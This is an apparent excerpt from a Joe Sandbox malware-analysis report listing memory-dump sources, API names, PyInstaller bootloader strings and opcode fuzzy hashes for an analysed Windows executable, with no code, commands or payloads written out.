                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                        • Instruction ID: 8f2de99faee511b69f0b0b80ae1a5505054f0b478c71683ad7f4d2d4a00409d4
                                                        • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                        • Instruction Fuzzy Hash: 2241E65A88D74E54F961B9184623AB49780DF227A0DD853FCDDAE173C2CE0D2987A130
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: BoundaryDeleteDescriptorErrorLast
                                                        • String ID:
                                                        • API String ID: 2050971199-0
                                                        • Opcode ID: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
                                                        • Instruction ID: 600fa20a7590d8b02730ab9bc315f616e5308f9493c3d49dbd61eb77a757a501
                                                        • Opcode Fuzzy Hash: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
                                                        • Instruction Fuzzy Hash: A9414876B14A5891FF14FF2AD9261A9F3A1B748FD0B889036DE0D87B58DE3DD0429310
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
                                                        • Instruction ID: 382156c8b9ba041cd886f0cb5557cf754758045ccd0f4fce938fdb926d892b59
                                                        • Opcode Fuzzy Hash: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
                                                        • Instruction Fuzzy Hash: 8D31F436B49B4252F764FB21A44313DB6E4AB86B90F84427CEA8D53BD6CF3CD002A710
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
                                                        • Instruction ID: 54e65fa423399a1fbf7216148e4a17ef2742712694e35ff72a7ae64465fad076
                                                        • Opcode Fuzzy Hash: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
                                                        • Instruction Fuzzy Hash: 49F044B9A582559AEBA4BF29B41362977D0E748380B8084BDD58983E14D63CD0509F14
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
                                                        • Instruction ID: 7bf9ec54a0a29cb128d50ed8288feb41188ace26b182a66c4dcd8b8d39521699
                                                        • Opcode Fuzzy Hash: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
                                                        • Instruction Fuzzy Hash: 61A00129988926E0F645BB20E85B070A270EB91700B9000B1D10E810A09FADA581A260
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                        • API String ID: 190572456-2208601799
                                                        • Opcode ID: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                        • Instruction ID: db3112d1f7a0a0780f059c14a0623741fc051af93fee3dacbd78073003d26f6e
                                                        • Opcode Fuzzy Hash: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                        • Instruction Fuzzy Hash: 1FE1C86CE89B13B0FA15BB54E8931B4E3A5AF08B40BC459F5C81E062A4EF7DF554F620
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Message_fread_nolock
                                                        • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                        • API String ID: 3065259568-2316137593
                                                        • Opcode ID: 99537fa9c1b008712a7aa3354c2a36c19b824afd4db305bccf9d22aff48769b5
                                                        • Instruction ID: c16c5e5fb6784f646b56e9f2cfb2b9ef0f02dc195d906eaac218ab1b4ac63e7e
                                                        • Opcode Fuzzy Hash: 99537fa9c1b008712a7aa3354c2a36c19b824afd4db305bccf9d22aff48769b5
                                                        • Instruction Fuzzy Hash: E151B329B8869765FA20B711E8536FAE394EF44B84FC040B5EE4E47BC5DE7CE541A310
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                        • String ID: P%
                                                        • API String ID: 2147705588-2959514604
                                                        • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                        • Instruction ID: 5251bf1307f87f73931aae4837844afff3497c9a6aad107f961fcbd96d52464d
                                                        • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                        • Instruction Fuzzy Hash: 6C510726A147A186E634AF22E4191BAF7A1F798B61F404171EBDF43684DF3CD045DB20
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: -$:$f$p$p
                                                        • API String ID: 3215553584-2013873522
                                                        • Opcode ID: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
                                                        • Instruction ID: 44509096f290846cdfc946fbb7404af5f5e1fc99fe72d893cb9d35f53ec25a43
                                                        • Opcode Fuzzy Hash: c6ac63e3974c66327622d921c1304357062fd3cb2bcbfe9c56688102bfb98152
                                                        • Instruction Fuzzy Hash: CC12E67AE4C14BA6FB20BB14D5572B9F6A1FB80754FD44279E689076C4DF3CE480AB20
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: f$f$p$p$f
                                                        • API String ID: 3215553584-1325933183
                                                        • Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                        • Instruction ID: c3cd34528f20061cf20ca2afaa240f703b516e24d91ef504a2da803e4756ef21
                                                        • Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                        • Instruction Fuzzy Hash: 5B12B33EE4C14BA6FB24BB14D0576BAF251FB80750FC44079E69A466C4DF7CE680AB20
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Message
                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                        • API String ID: 2030045667-3659356012
                                                        • Opcode ID: 5c28c44b31565bf2893c1db4d2debdb7d0527840850c2b75d7ab63ec7bd8cdee
                                                        • Instruction ID: 2231df275e7f28371b89a6c421a494b8ff46f4f09fa558986edc718eecdbbc5a
                                                        • Opcode Fuzzy Hash: 5c28c44b31565bf2893c1db4d2debdb7d0527840850c2b75d7ab63ec7bd8cdee
                                                        • Instruction Fuzzy Hash: CF31B429B8865366FE24FB11E8431BAE390EF44BC4FC840B5DE4E07A95EE3DE501A710
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
                                                        • Instruction ID: 236e7361c6d05501d386233f888405ca04049fa2633f0d7c7c84fdcacae06c67
                                                        • Opcode Fuzzy Hash: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
                                                        • Instruction Fuzzy Hash: 9BE1AD7AA4876196FB20BB65D4836BDB7A0FB48788F9001B5EE4D47B95CF38E080D750
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE18747
                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE1879E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide
                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                        • API String ID: 626452242-27947307
                                                        • Opcode ID: 880ff2e63ba81a384871d9a2b2c380e34ab45f047a7bf3c31ff76456a7931f4a
                                                        • Instruction ID: 4e4251f0cc0fca09ff4b336f7ddc64032754068056871f907e3c1e4153f37f1e
                                                        • Opcode Fuzzy Hash: 880ff2e63ba81a384871d9a2b2c380e34ab45f047a7bf3c31ff76456a7931f4a
                                                        • Instruction Fuzzy Hash: 5D419036A48A9292F620FF15F84312AF6A1FB84B90FD442B5DA8D87B94DF3CD051E710
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(?,00007FF73AE139EA), ref: 00007FF73AE18C31
                                                          • Part of subcall function 00007FF73AE129E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF73AE187F2,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE12A14
                                                          • Part of subcall function 00007FF73AE129E0: MessageBoxW.USER32 ref: 00007FF73AE12AF0
                                                        • WideCharToMultiByte.KERNEL32(?,00007FF73AE139EA), ref: 00007FF73AE18CA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                        • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                        • API String ID: 3723044601-27947307
                                                        • Opcode ID: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
                                                        • Instruction ID: 9f90866b3da9b25f8f2c8ec08ffc8e4c411f01c415b28358d159e3ace75c3846
                                                        • Opcode Fuzzy Hash: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
                                                        • Instruction Fuzzy Hash: FA218D3AA49B42A5FB10FF56E843079B361EB84B80FD846B5DA4D43794EF3CE551A310
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                        • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                        • API String ID: 3231891352-3501660386
                                                        • Opcode ID: 43727e2b7280e09f935105e65e29158365b4f6ac20193684fbb2c56705301ad1
                                                        • Instruction ID: 5d5cd9043f092499a78e85a07162d02323ec846e54023349b8e79490eccab20e
                                                        • Opcode Fuzzy Hash: 43727e2b7280e09f935105e65e29158365b4f6ac20193684fbb2c56705301ad1
                                                        • Instruction Fuzzy Hash: E151B26DE8D66361FA10B725E9532F9E2915F86F80FC400F0E91D872C6EE2CE900B760
                                                        APIs
                                                          • Part of subcall function 00007FF73AE18AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A
                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF73AE179A1,00000000,?,00000000,00000000,?,00007FF73AE1154F), ref: 00007FF73AE1747F
                                                          • Part of subcall function 00007FF73AE12B30: MessageBoxW.USER32 ref: 00007FF73AE12C05
                                                        Strings
                                                        • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF73AE17456
                                                        • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF73AE174DA
                                                        • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF73AE17493
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                        • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                        • API String ID: 1662231829-3498232454
                                                        • Opcode ID: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
                                                        • Instruction ID: 19df55aff2ad1aeb20b2c33c6c19365d28ae9d31050dacd51f38338fe4588a95
                                                        • Opcode Fuzzy Hash: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
                                                        • Instruction Fuzzy Hash: 7E31EC59F9C75260FA20B721D9533BAE251AF99BC0FC444F5DA4E427D6EE3CE104BA20
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF73AE1E06A,?,?,?,00007FF73AE1DD5C,?,?,00000001,00007FF73AE1D979), ref: 00007FF73AE1DE3D
                                                        • GetLastError.KERNEL32(?,?,?,00007FF73AE1E06A,?,?,?,00007FF73AE1DD5C,?,?,00000001,00007FF73AE1D979), ref: 00007FF73AE1DE4B
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF73AE1E06A,?,?,?,00007FF73AE1DD5C,?,?,00000001,00007FF73AE1D979), ref: 00007FF73AE1DE75
                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF73AE1E06A,?,?,?,00007FF73AE1DD5C,?,?,00000001,00007FF73AE1D979), ref: 00007FF73AE1DEBB
                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF73AE1E06A,?,?,?,00007FF73AE1DD5C,?,?,00000001,00007FF73AE1D979), ref: 00007FF73AE1DEC7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
